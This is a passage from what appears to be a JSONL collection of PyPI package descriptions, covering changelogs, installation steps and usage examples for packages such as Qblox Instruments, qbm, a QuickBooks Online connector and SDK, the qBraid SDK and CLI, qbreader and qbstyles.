to divide them in a Pulsar and a\nCluster section.Changed QRM output offset range to 1Vpp.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.2.Pulsar QRM: compatible with device firmwarev0.7.2.Cluster: compatible with device firmwarev0.2.2.Note:You can also find this release on Gitlabhere.0.6.1 (20-05-2022)Changelog:Added input and output attenuation control for RF-modules.Added the ability to disable LOs in RF-modules.Added a method to manually restart ADC calibration in QRM and QRM-RF modules. Be aware that this is a preliminary\nmethod that might change in the near future.Changed the SPI Rack driver to eliminate unwanted voltage/current jumps by disabling the reset of\nvoltages/currents on initialization and adding checks to prevent the user to set a value outside of the currently\nset span.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.1.Pulsar QRM: compatible with device firmwarev0.7.1.Cluster: compatible with device firmwarev0.2.1.Note:You can also find this release on Gitlabhere.0.6.0 (29-03-2022)This release introduces a significant refactor to Qblox Instruments as both a general restructure is introduced\nand the preliminary Cluster driver is replaced by the definitive driver. Unfortunately, this means that this\nrelease also introduces a few breaking changes. In exchange, we believe that this release prepares Qblox Instruments\nfor the future.Changelog:Renamed all classes to be compliant with PEP8\u2019s capswords format.Restructured imports; all drivers are now imported directly fromqblox_instrumentsas follows:from qblox_instruments import Cluster, Pulsar, SpiRackfrom qblox_instruments.qcodes_drivers.spi_rack_modules import D5aModule, S4gModuleWith the new Cluster firmware release, the user now interacts with the Cluster as a single instrument instead\nof a rack of instruments. The new Cluster driver reflects this. It detects where and which modules are in the rack\nand automatically makes them accessible as an InstrumentChannel submodule accessible asCluster.module, wherexis the slot index of the rack.The Pulsar QCM and Pulsar QRM drivers have been combined into a single Pulsar driver that covers the functionality\nof both.The SPI Rack driver driver has been split into a native and QCoDeS layer to improve separation of functionality.Each sequencer\u2019s parameters are now accessible through it\u2019s own InstrumentChannel submodule. This means\nthat parameters are now accessible asmodule.sequencer.parameter, wherexis the sequencer index.Renamedget_system_statustoget_system_stateto be inline with other state method names.The methodsget_system_stateandget_sequencer_statenow return namedtuples of typeSystemStateandSequencerStaterespectively to ease handling of the returned statuses and accompanying flags.Renamed the sequencer\u2019swaveform_and_programsparameter tosequence.The way to configure the driver as a dummy has been changed to use enums for module type selection.Added keep alive pinging to the socket interface to keep the instrument connection from closing after\na platform dependant idle period.Fixed general code duplication problem between instruments.Introducedqblox-cfgas the new configuration management tool with which to update the Cluster and Pulsar\ninstruments. As of Pulsar firmware release v0.7.0 and Cluster firmware release v0.2.0, the configuration\nmanagement tool is no longer shipped with the release, but insteadqblox-cfgmust be used. This new tool provides\nfar more functionality and exposes the improved network configurability of the latest firmware releases.On top of the new configuration management tool,qblox-pnpis also instroduced as the new network debug tool.\nThis tool, in combination with the latest firmware releases, allows to easily find instruments in the network and\nto potentially recover them in case of network/IP configuration problems.Improved unit test coverage.Updated the documentation on Read the Docs to reflect the changes.Added various improvements and fixes to the tutorials.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.7.0.Pulsar QRM: compatible with device firmwarev0.7.0.Cluster: compatible with device firmwarev0.2.0.Note:You can also find this release on Gitlabhere.0.5.4 (22-12-2021)Changelog:Cleaned code to improve unit test code coverage.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.3.Pulsar QRM: compatible with device firmwarev0.6.3.Cluster CMM: compatible with device firmware v0.1.1.Cluster CMM: compatible with device firmware v0.1.5.Cluster CMM: compatible with device firmware v0.1.5.Note:You can also find this release on Gitlabhere.0.5.3 (26-11-2021)Changelog:Improved __repr__ response from the QCoDeS drivers.Added tutorials for multiplexed sequencing, mixer correction, RF-control and Rabi experiments.Fixed empty acquisition list readout from dummy modules.Added RF-module support to dummy modules.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.2.Pulsar QRM: compatible with device firmwarev0.6.2.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.3.Cluster CMM: compatible with device firmware v0.1.3.Note:You can also find this release on Gitlabhere.0.5.2 (11-10-2021)Changelog:Device compatibility update.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.2.Pulsar QRM: compatible with device firmwarev0.6.2.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.3.Cluster CMM: compatible with device firmware v0.1.3.Note:You can also find this release on Gitlabhere.0.5.1 (07-10-2021)Changelog:Device compatibility update.Added channel map functionality to dummy layer.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.1.Pulsar QRM: compatible with device firmwarev0.6.1.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.2.Cluster CMM: compatible with device firmware v0.1.2.Note:You can also find this release on Gitlabhere.0.5.0 (05-10-2021)Changelog:Increased sequencer support to 6 sequencers per instrument.Added support for real-time mixer correction.Renamed Pulsar QRM input gain parameters to be inline with output offset parameter names.Updated the assemblers for the Pulsar QCM and QRM dummy drivers to support the phase reset instruction.Added preliminary driver for the Cluster.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.6.0.Pulsar QRM: compatible with device firmwarev0.6.0.Cluster CMM: compatible with device firmware v0.1.0.Cluster CMM: compatible with device firmware v0.1.1.Cluster CMM: compatible with device firmware v0.1.1.Note:You can also find this release on Gitlabhere.0.4.0 (21-07-2021)Changelog:Changed initial Pulsar QCM and QRM device instantiation timeout from 60 seconds to 3 seconds.Added support for the new Pulsar QRM acquisition path functionalities (i.e. real-time demodulation, integration, discretization, averaging, binning).Updated the assemblers for the Pulsar QCM and QRM dummy drivers.Switched from using a custom function to using functools in the QCoDeS parameters.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.2.Pulsar QRM: compatible with device firmwarev0.5.0.Note:You can also find this release on Gitlabhere.0.3.2 (21-04-2021)Changelog:Added QCoDeS driver for D5A SPI-rack module.Updated documentation on ReadTheDocs.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.1.Pulsar QRM: compatible with device firmwarev0.4.1.Note:You can also find this release on Gitlabhere.0.3.1 (09-04-2021)Changelog:Device compatibility update.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.1.Pulsar QRM: compatible with device firmwarev0.4.1.Note:You can also find this release on Gitlabhere.0.3.0 (25-03-2021)Changelog:Added preliminary internal LO support for development purposes.Added support for Pulsar QCM\u2019s output offset DACs.Made IDN fields IEEE488.2 compliant.Added SPI-rack QCoDeS drivers.Fixed sequencer offset instruction in dummy assemblers.Changed acquisition out-of-range result implementation from per sample basis to per acquisition basis.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.5.0.Pulsar QRM: compatible with device firmwarev0.4.0.Note:You can also find this release on Gitlabhere.0.2.3 (03-03-2021)Changelog:Small improvements to tutorials.Small improvements to doc strings.Socket timeout is now set to 60s to fix timeout issues.The get_sequencer_state and get_acquisition_state functions now express their timeout in minutes iso seconds.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.2.2 (25-01-2021)Changelog:Improved documentation on ReadTheDocs.Added tutorials to ReadTheDocs.Fixed bugs in Pulsar dummy classes.Fixed missing arguments on some function calls.Cleaned code after static analysis.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.2.1 (01-12-2020)Changelog:Fixed get_awg_waveforms for Pulsar QCM.Renamed get_acquisition_status to get_acquisition_state.Added optional blocking behaviour and timeout to get_sequencer_state.Corrected documentation on Read The Docs.Added value mapping for reference_source and trigger mode parameters.Improved readability of version mismatch.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.2.0 (21-11-2020)Changelog:Added support for floating point temperature readout.Renamed QCoDeS parameter sequencer#_nco_phase to sequencer#_nco_phase_offs.Added support for Pulsar QCM input gain control.Significantly improved documentation on Read The Docs.Driver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.4.0.Pulsar QRM: compatible with device firmwarev0.3.0.Note:You can also find this release on Gitlabhere.0.1.2 (22-10-2020)Changelog:Fixed Windows assembler for dummy PulsarFixed MacOS assembler for dummy PulsarDriver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.3.0.Pulsar QRM: compatible with device firmwarev0.2.0.Note:You can also find this release on Gitlabhere.0.1.1 (05-10-2020)Changelog:First release on PyPIDriver/firmware compatibility:Pulsar QCM: compatible with device firmwarev0.3.0.Pulsar QRM: compatible with device firmwarev0.2.0.Note:You can also find this release on Gitlabhere."} +{"package": "qbm", "pacakge-description": "Quantum Boltzmann MachinesTheqbmPython package is designed for training and analyzing quantum Boltzmann machines (QBMs) using either a simulation or a D-Wave quantum annealer.\nThe QBM implemented here is based on the work inQuantum Boltzman Machineby Amin et al.[1].\nThis package originated as part of the thesisQuantum Boltzmann Machines: Applications in Quantitative Finance.Table of ContentsInstallationConda EnvironmentUsageBasic ConfigurationBQRBM ModelInstantiationTrainingSamplingSaving and LoadingExampleReferencesInstallationTheqbmpackage can be installed withpip install qbmUsageBasic ConfigurationTheqbmpackage is mainly configured around the project directory, which can be set with theQBM_PROJECT_DIRenvironment variable.\nOnce the environment variable is set one can use theqbm.utils.get_project_dir()function to get a path object to the directory.BQRBM ModelThe BQRBM, or bound-based quantum restricted Boltzmann machine, is a quantum Boltzmann machine that has intra-layer restrictions and is trained via maximization of the log-likelihood lower bound.\nThe model currently only has the ability to train in the specific case wheres_freeze = 1, i.e., when it reduces to a classical RBM trained with quantum assistance, because estimating the effective inverse temperature is nontrivial for the general case.All of the arguments to the methods below are further explained in their respective docstrings.InstantiationA BQRBM model can be instantiated as (for example)model = BQRBM(\n V_train,\n n_hidden,\n A_freeze,\n B_freeze,\n beta_initial=1.0,\n simulation_params={\"beta\": 1.0},\n seed=0,\n)One needs to choose whether or not they want to train a model using a simulation or an annealer, and this is done by passing eithersimulation_paramsorannealer_params.\nWhichever is passed decides how the model is trained.TrainingThe model can be trained by runningmodel.train(\n n_epochs=100,\n learning_rate=1e-1,\n learning_rate_beta=1e-1,\n mini_batch_size=10,\n n_samples=10_000,\n callback=None,\n)SamplingThe model can generate samples by runningmodel.sample(\n n_samples,\n answer_mode=\"raw\",\n use_gauge=True,\n binary=False,\n)Saving and LoadingThe model can be saved withmodel.save(\"/path/to/model.pkl\")and loaded again withmodel = BQRBM.load(\"/path/to/model.pkl\")ExampleAn example notebook can be foundhereReferences[1]Mohammad H. Amin et al. \u201cQuantum Boltzmann Machine\u201d. In: Phys. Rev. X 8 (2 May 2018), p. 021050. doi: 10.1103/PhysRevX.8.021050. url:https://link.aps.org/doi/10.1103/PhysRevX.8.021050."} +{"package": "qbodbc", "pacakge-description": "qbodbcConnect to your QuickBooks desktop instance with Python.ConnectingThe application server, and the QuickBooks instance must be on\nthe same machine or have QODBC driver and QRemote running\non the QuickBooks application box.The alternative is to run middleware in front of the QuickBooks\ninstnace that can deserialize and process incoming qbodbc objects."} +{"package": "qbo-db-connector", "pacakge-description": "Quickbooks Online Database ConnectorConnects Quickbooks online to a database to transfer information to and fro.InstallationThis project requiresPython 3+.Download this project and use it (copy it in your project, etc).Install it frompip.$ pip install qbo-db-connectorUsageTo use this connector you'll need these Quickbooks credentials used for OAuth2 authentication:client ID,client secretandrefresh token.This connector is very easy to use.importloggingimportsqlite3fromqbosdkimportQuickbooksOnlineSDKfromqbo_db_connectorimportQuickbooksExtractConnector,QuickbooksLoadConnectordbconn=sqlite3.connect('/tmp/temp.db')logger=logging.getLogger('Quickbooks usage')logging.basicConfig(format='%(asctime)s%(name)s:%(message)s',level=logging.INFO,handlers=[logging.StreamHandler()])quickbooks_config={'client_id':'','client_secret':'','realm_id':'','refresh_token':'','environment':'',}logger.info('Quickbooks db connector usage')connection=QuickbooksOnlineSDK(client_id=quickbooks_config['client_id'],client_secret=quickbooks_config['client_secret'],refresh_token=quickbooks_config['refresh_token'],realm_id=quickbooks_config['realm_id'],environment=quickbooks_config['environment'])quickbooks_extract=QuickbooksExtractConnector(qbo_connection=connection,dbconn=dbconn)quickbooks_load=QuickbooksLoadConnector(qbo_connection=connection,dbconn=dbconn)# make sure you save the updated refresh tokenrefresh_token=connection.refresh_token# extractingquickbooks_extract.extract_employees()quickbooks_extract.extract_accounts()quickbooks_extract.extract_classes()quickbooks_extract.extract_departments()quickbooks_extract.extract_home_currency()quickbooks_extract.extract_exchange_rates()# loadingquickbooks_load.load_check(check_id='100')quickbooks_load.load_journal_entry(journal_entry_id='800')quickbooks_load.load_attachments(ref_id='100',ref_type='Purchase')ContributeTo contribute to this project follow the stepsFork and clone the repository.Runpip install -r requirements.txtSetup pylint precommit hookCreate a file.git/hooks/pre-commitCopy and paste the following lines in the file -#!/usr/bin/env bashgit-pylint-commit-hookRunchmod +x .git/hooks/pre-commitMake necessary changesRun unit tests to ensure everything is fineUnit TestsTo run unit tests, run pytest in the following manner:python -m pytest test/unitYou should see something like this:================================================================== test session starts ==================================================================\n-------------------------------------------------------------------------------------------------------------------------------- live log call ---------------------------------------------------------------------------------------------------------------------------------\n2019-12-24 12:10:46 [ INFO] test.unit.test_mocks: Testing mock data (test_mocks.py:18)\nPASSED [ 69%]\ntest/unit/test_mocks.py::test_dbconn_mock_setup\n-------------------------------------------------------------------------------------------------------------------------------- live log call ---------------------------------------------------------------------------------------------------------------------------------\n2019-12-24 12:10:46 [ INFO] test.unit.test_mocks: Testing mock dbconn (test_mocks.py:29)\nPASSED [ 76%]\ntest/unit/test_mocks.py::test_qec_mock_setup [100%]\n\n=================================================================== 3 passed in 0.10s ===================================================================Integration TestsTo run integration tests, you will need a mechanism to connect to a real qbo account. Save this info in a test_credentials.json file in your root directory:{\"client_id\":\"\",\"client_secret\":\"\",\"realm_id\":\"\",\"refresh_token\":\"\",\"environment\":\"\"}Code coverageTo get code coverage report, run this command:----------coverage:platformdarwin,python3.7.4-final-0-----------\nNameStmtsMissCover\n--------------------------------------------------\nqbo_db_connector/__init__.py20100%\nqbo_db_connector/extract.py79396%\nqbo_db_connector/load.py71987%\n--------------------------------------------------\nTOTAL1521292%To get an html report, run this command:python-mpytest--cov=qbo_db_connector--cov-reporthtml:cov_htmlWe want to maintain code coverage of more than 90% for this project at all times.Please note that maintaining a score of 10 is important as the CI pylint action fails when a pull request is openedLicenseThis project is licensed under the MIT License - see theLICENSEfile for details"} +{"package": "qbosdk", "pacakge-description": "QuickbooksOnlineSDKPython SDK for accessing QBO APIs.InstallationThis project requiresPython 3+andRequestslibrary (pip install requests).Download this project and use it (copy it in your project, etc).Install it frompip.$ pip install qbosdkUsageTo use this SDK you'll need these QBO credentials used for OAuth2 authentication:client ID,client secretandrefresh token.This SDK is very easy to use.First you'll need to create a connection using the main class QuickbooksOnlineSDK.fromqbosdkimportQuickbooksOnlineSDKconnection=QuickbooksOnlineSDK(client_id='',client_secret='',refresh_token='',realm_id='',environment='')After that you'll be able to access any of the API classes\"\"\"USAGE: ..()\"\"\"# Get a list of all Employees (with all available details for Employee)response=connection.employees.get()# Get a list of all Accountsresponse=connection.accounts.get()See more details about the usage into the wiki pages of this project.Integration TestsTo run integration tests, you will need a mechanism to connect to a real qbo account. Save this info in a test_credentials.json file in your root directory:{\"client_id\":\"\",\"client_secret\":\"\",\"realm_id\":\"\",\"refresh_token\":\"\",\"environment\":\"\"}$pipinstallpytest\n\n$python-mpytesttest/integrationLicenseThis project is licensed under the MIT License - see theLICENSEfile for details"} +{"package": "qbox", "pacakge-description": "FeaturesTODORequirementsTODOInstallationYou can installQuantum BoxviapipfromPyPI:$pipinstallqboxUsagePlease see theCommand-line Referencefor details.ContributingContributions are very welcome.\nTo learn more, see theContributor Guide.LicenseDistributed under the terms of theMIT license,Quantum Boxis free and open source software.IssuesIf you encounter any problems,\npleasefile an issuealong with a detailed description.CreditsThis project was generated from@cjolowicz\u2019sHypermodern Python Cookiecuttertemplate."} +{"package": "qb_penTester", "pacakge-description": "No description available on PyPI."} +{"package": "qbpy", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qbraid", "pacakge-description": "The qBraid-SDK is a Python toolkit for cross-framework abstraction,\ntranspilation, and execution of quantum programs.FeaturesUnified quantum frontend interface.Transpilequantum circuits between\nsupported packages. Leverage the capabilities of multiple frontends throughsimple, consistent protocols.Build once, target many.Createquantum programs using your preferred\ncircuit-building package, andexecuteon any backend that interfaces with\na supported frontend.Benchmark, compare, interpret results. Built-incompatiblepost-processing\nenables comparing results between runs andacross backends.Installation & SetupFor the best experience, install the qBraid-SDK environment onlab.qbraid.com. Login (orcreate an account) and follow the steps toinstall an environment.Using the SDK on qBraid Lab means direct, pre-configured access to allAmazon Braket supported deviceswith no additional access keys or API tokens required. SeeqBraid Quantum Jobsfor more.Local installThe qBraid-SDK, and all of its dependencies, can also be installed using pip:pipinstallqbraidYou can alsoinstall from sourceby cloning this repository and running a pip install command in the root directory of the repository:gitclonehttps://github.com/qBraid/qBraid.gitcdqBraid\npipinstall-e'.[all]'Note: The qBraid-SDK requires Python 3.9 or greater.If using locally, follow linked instructions to configure yourqBraid,AWS,\nandIBMQcredentials.Check versionYou can view the version of the qBraid-SDK you have installed within Python using the following:In[1]:importqbraidIn[2]:qbraid.__version__Documentation & TutorialsqBraid documentation is available atdocs.qbraid.com.See also:API ReferenceUser GuideExample NotebooksQuickstartTranspilerConstruct a quantum program of any supported program type.Below,SUPPORTED_QPROGRAMSmaps shorthand identifiers for supported quantum programs, each corresponding to a type in the typedQPROGRAMUnion.\nFor example, 'qiskit' maps toqiskit.QuantumCircuitinQPROGRAM. Notably, 'qasm2' and 'qasm3' both represent raw OpenQASM strings.\nThis arrangement simplifies targeting and transpiling between different quantum programming frameworks.>>>fromqbraidimportSUPPORTED_QPROGRAMS>>>SUPPORTED_QPROGRAMS{'cirq':'cirq.circuits.circuit.Circuit','qiskit':'qiskit.circuit.quantumcircuit.QuantumCircuit','pyquil':'pyquil.quil.Program','pytket':'pytket._tket.circuit.Circuit','braket':'braket.circuits.circuit.Circuit','openqasm3':'openqasm3.ast.Program','qasm2':'str','qasm3':'str'}Pass any quantum program of typeqbraid.QPROGRAMto thecircuit_wrapper()and specify a target package\nfromSUPPORTED_QPROGRAMSto \"transpile\" your circuit to a new program type:>>>fromqbraidimportcircuit_wrapper>>>fromqbraid.interfaceimportrandom_circuit>>>qiskit_circuit=random_circuit(\"qiskit\")>>>cirq_circuit=circuit_wrapper(qiskit_circuit).transpile(\"cirq\")>>>print(qiskit_circuit)\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510q_0:\u2500\u2500\u25a0\u2500\u2500\u2524Rx(3.0353)\u251c\u250c\u2500\u2534\u2500\u2510\u2514\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2518q_1:\u2524H\u251c\u2500\u2500\u2500\u2500\u2524\u221aX\u251c\u2500\u2500\u2500\u2500\u2514\u2500\u2500\u2500\u2518\u2514\u2500\u2500\u2500\u2500\u2518>>>print(cirq_circuit)0:\u2500\u2500\u2500@\u2500\u2500\u2500Rx(0.966\u03c0)\u2500\u2500\u2500\u25021:\u2500\u2500\u2500H\u2500\u2500\u2500X^0.5\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500The same functionality can be achieved using the underlyingconvert_to_package()function directly:>>>fromqbraidimportconvert_to_package>>>cirq_circuit=convert_to_package(qiskit_circuit,\"cirq\")Behind the scenes, the qBraid-SDK usesnetworkxto create a directional graph that maps all possible conversions between supported program types:fromqbraid.transpilerimportConversionGraphfromqbraid.visualizationimportplot_conversion_graphgraph=ConversionGraph()plot_conversion_graph(graph)You can use the native conversions supported by qBraid, or define your own custom nodes and/or edges. Seeexample.Devices & JobsSearch for quantum backend(s) on which to execute your program.>>>fromqbraidimportget_devices>>>get_devices()Devicestatusupdated0minutesagoDeviceIDStatus---------------aws_oqc_lucyONLINEaws_ionq_aria2OFFLINEaws_rigetti_aspen_m3ONLINEibm_q_brisbaneONLINE...Apply thedevice_wrapper(), and send quantum jobs to any supported backend,\nfrom any supported program type:>>>fromqbraidimportdevice_wrapper,get_jobs>>>aws_device=device_wrapper(\"aws_oqc_lucy\")>>>ibm_device=device_wrapper(\"ibm_q_brisbane\")>>>aws_job=aws_device.run(qiskit_circuit,shots=1000)>>>ibm_job=ibm_device.run(cirq_circuit,shots=1000)>>>get_jobs()Displaying2mostrecentjobs:JobIDSubmittedStatus---------------------aws_oqc_lucy-exampleuser-qjob-zzzzzzz...2023-05-21T21:13:47.220ZQUEUEDibm_q_brisbane-exampleuser-qjob-xxxxxxx...2023-05-21T21:13:48.220ZRUNNING...Compare results in a consistent, unified format:>>>aws_result=aws_job.result()>>>ibm_result=ibm_job.result()>>>aws_result.measurement_counts(){'00':483,'01':14,'10':486,'11':17}>>>ibm_result.measurement_counts(){'00':496,'01':12,'10':479,'11':13}Local account setupTo use the qBraid-SDK locally (outside of qBraid Lab), you must add your account\ncredentials:Create a qBraid account or log in to your existing account by visitingaccount.qbraid.comCopy your API Key token from the left side of\nyouraccount page:Save your API key from step 2 by callingQbraidSession.save_config():fromqbraid.apiimportQbraidSessionsession=QbraidSession(api_key='API_KEY')session.save_config()The command above stores your credentials locally in a configuration file~/.qbraid/qbraidrc,\nwhere~corresponds to your home ($HOME) directory. Once saved, you can then connect to the\nqBraid API and leverage functions such asget_devices()andget_jobs().Load Account from Environment VariablesAlternatively, the qBraid-SDK can discover credentials from environment\nvariables:exportJUPYTERHUB_USER='USER_EMAIL'exportQBRAID_API_KEY='QBRAID_API_KEY'Then instantiate the session without any argumentsfromqbraid.apiimportQbraidSessionsession=QbraidSession()Launch on qBraidThe \"Launch on qBraid\" button (below) can be added to any public GitHub\nrepository. Clicking on it automaically opens qBraid Lab, and performs agit cloneof the project repo into your account's home directory. Copy the\ncode below, and replaceYOUR-USERNAMEandYOUR-REPOSITORYwith your GitHub\ninfo.Use the badge in your project'sREADME.md:[](https://account.qbraid.com?gitHubUrl=https://github.com/YOUR-USERNAME/YOUR-REPOSITORY.git)Use the badge in your project'sREADME.rst:..image::https://qbraid-static.s3.amazonaws.com/logos/Launch_on_qBraid_white.png:target:https://account.qbraid.com?gitHubUrl=https://github.com/YOUR-USERNAME/YOUR-REPOSITORY.git:width:150pxContributingInterested in contributing code, or making a PR? SeeCONTRIBUTING.mdFor feature requests and bug reports:Submit an issueFor discussions, and specific questions about the qBraid SDK, qBraid Lab, or\nother topics,join our discord communityFor questions that are more suited for a forum, post toQuantum Computing Stack Exchangewith theqbraidtag.Want your open-source project featured as its own runtime environment on\nqBraid Lab? Fill out ourNew Environment Request FormLicenseGNU General Public License v3.0"} +{"package": "qbraid-cli", "pacakge-description": "Command Line Interface for interacting with all parts of the qBraid platform.TheqBraid CLIis a specialized command-line interface tool designedexclusivelyfor use within theqBraid Labplatform. It is not intended for local installations or use outside the qBraid Lab environment. This tool ensures seamless integration and optimized performance specifically tailored for qBraid Lab's unique cloud-based quantum computing ecosystem.Getting StartedTo use the qBraid CLI, login to qBraid (or create an account), launch Lab, and then open Terminal. You can also access the CLI directly from withinNotebooksusing the!operator. Seequantum jobs example.Launch qBraid Lab \u2192Make an account \u2192For help, see qBraid Lab User Guide:Getting Started.Basic Commands$qbraid\n-------------------------------\n*WelcometotheqBraidCLI!*\n--------------------------------Use`qbraid-h`toseeavailablecommands.-Use`qbraid--version`todisplaythecurrentversion.\n\nReferenceDocs:https://docs.qbraid.com/projects/cli/en/latest/cli/qbraid.htmlA qBraid CLI command has the following structure:$qbraid[optionsandparameters]For example, to list installed environments, the command would be:$qbraidenvslistTo view help documentation, use one of the following:$qbraidhelp$qbraidhelp$qbraidhelpFor example:$qbraidhelpGroupqbraid\n\nSubgroupsenvs:ManageqBraidenvironments.kernels:ManageqBraidkernels.jobs:ManageqBraidQuantumJobs.\n\nArguments-V,--version:ShowversionandexitGlobalArguments-h,--help:Showthishelpmessageandexit.\n\nReferenceDocs:https://docs.qbraid.com/en/latest/cli/qbraid.htmlTo get the version of the qBraid CLI:$qbraid--version"} +{"package": "qbraid-qir", "pacakge-description": "Work in progressqBraid-SDK extension providing support for QIR conversions.This project aims to makeQIRrepresentations accessible via the qBraid-SDKtranspiler, and by doing so, open the door to language-specific conversions from any and all high-level quantum languagessupportedbyqbraid. See QIR Alliance:why do we need it?.Getting startedInstallationpipinstallqbraid-qirExampleimportcirqfromqbraid_qirimportcirq_to_qirq0,q1=cirq.LineQubit.range(2)circuit=cirq.Circuit(cirq.H(q0),cirq.CNOT(q0,q1),cirq.measure(q0,q1))module=cirq_to_qir(circuit,name=\"my-circuit\")ir=str(module)DevelopmentInstall from sourcegitclonehttps://github.com/qBraid/qbraid-qir.gitcdqbraid-qir\npipinstall-e.Run testspipinstall-rrequirements-dev.txt\npytesttestswith coverage reportpytest--cov=qbraid_qir--cov-report=termtests/Build docscddocs\npipinstall-rrequirements.txt\nmakehtmlArchitecture diagram"} +{"package": "qbreader", "pacakge-description": "QBreader Python API wrapper moduleAccessing the QBreader API with a python wrapper module.DocumentationGet a list of sets from the QBreader databaseset_list()This function gets a list of sets from the QBreader database.Search the QBreader databasequery()This function searches the QBreader database for questions that match the parameters specified.ParameterTypeValuesDescriptionquestionTypestringtossup,bonus,allThe type of question to search for. Defaults to \"all\". If one of the three is not set, returns a 400 Bad Request.searchTypestringquestion,answerThe type of search to perform. Defaults to \"all\". If one of the three is not set, returns a 400 Bad Request.queryStringstringAny string.The string to search for. Defaults to \"\".regexboolTrue,FalseWhether or not to use regular expressions for the queryString. Defaults to \"False\".randomizeboolTrue,FalseWhether or not to randomize the order of the results. Defaults to \"False\".setNamestringAny stringThe difficulties to search for. Defaults to []. Leave as an empty list to search all. Must be a list of ints from 1 to 10.difficultieslist[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]The string to search for. Defaults to \"\".categorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The categories to search for. Defaults to []. Leave as an empty list to search all.subcategorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The subcategories to search for. Defaults to []. Leave as an empty list to search all.maxQueryReturnLengthintAny integer.The maximum number of questions to return. Defaults to None. Leave blank to return 50. Anything over 200 will not work.Get a random question from the QBreader databaserandom_question()This function gets a random question from the QBreader database.ParameterTypeValuesDescriptionquestionTypestringtossup,bonusThe type of question to search for (tossup or bonus). If one of the two is not set, returns a 400 Bad Request.difficultieslist[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]The string to search for. Defaults to \"\".categorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The categories to search for. Defaults to []. Leave as an empty list to search all.subcategorieslistSeehttps://pastebin.com/McVDGDXgfor a full list.The subcategories to search for. Defaults to []. Leave as an empty list to search all.numberintAny integer.The number of questions to return. Defaults to None. Leave blank to return 1.Generate a random namerandom_question()This function Generates an adjective-noun pair (used in multiplayer lobbies)Get questions from a packet from the QBreader databasepacket()This function gets questions from a packet from the QBreader database.ParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().packetNumberintAny integer that corresponds to a packet number, usually from 1-11.The number of the packet to search for.Get a packet's tossups from the QBreader databasepacket_tossups()This function gets a packet's tossups from the QBreader database. Twice as fast as using packet().ParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().packetNumberintAny integer that corresponds to a packet number, usually from 1-11.The number of the packet to search for.Get a packet's bonuses from the QBreader databasepacket_bonuses()This function gets a packet's bonuses from the QBreader database. Twice as fast as using packet().ParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().packetNumberintAny integer that corresponds to a packet number, usually from 1-11.The number of the packet to search for.Get the number of packets in a set from the QBreader databasepacket_bonuses()This function gets the number of packets in a set from the QBreader databaseParameterTypeValuesDescriptionsetNamestringNames of sets can be obtained by running set_list()The name of the set to search. Can be obtained from set_list().Report a question from the QBreader databasereport_question()This function reports a question from the QBreader database.ParameterTypeValuesDescription_idstringCan be obtained from thequery(),random_question,packet(),packet_bonuses, orpacket_tossups.The ID of the question to report.reasonstringN/AThe reason for reporting the question. Defaults to None.descriptionstringN/AA description of the reason for reporting the question. Defaults to None.Get a list of rooms from the QBreader databaseroom_list()This function gets a list of rooms from the QBreader database."} +{"package": "qbs", "pacakge-description": "See theGitLab repositoryfor the most up-to-date documentation.New in version 2.0.0: t_auto command! Any existing commands named t_auto will be broken."} +{"package": "qb-sdk", "pacakge-description": "qb-sdk-pythonBrand SDK for the qiibee blockchain.RequirementsConsult thedocsto see how to obtain the credentials necessary for this.Installationpip install qb-sdkExample usageImport the SDK library:import qbsdkInitialize the API object:api_key = os.environ['QB_API_KEY']\nbrand_address_private_key = os.environ['BRAND_ADDRESS_PRIVATE_KEY']\ntoken_symbol = os.environ['BRAND_TOKEN_SYMBOL']\napi = qbsdk.Api(api_key)Fetch existing tokens:tokens = api.get_tokens()\nfor token in tokens.private:\n print(vars(token))Reward a particular user:wallet = qbsdk.Wallet(brand_address_private_key, token_symbol, api, transfer_strategy=qbsdk.TransferStrategy.brand)\n\nwallet.setup()\n\ntransfer_receiver = '0x87265a62c60247f862b9149423061b36b460f4bb'\ntx = wallet.send_transaction(transfer_receiver, 10)Check out theexamplesdirectory for more comprehensive examples."} +{"package": "qbstreamlit", "pacakge-description": "qbstreamlitFunctions for quizbowl detailed stats."} +{"package": "qbstyles", "pacakge-description": "QB StylesQB Styles is a python package with a light and a darkmatplotlibstyle.Dark styleLight styleHow do I install QB Styles?qbstylesis a 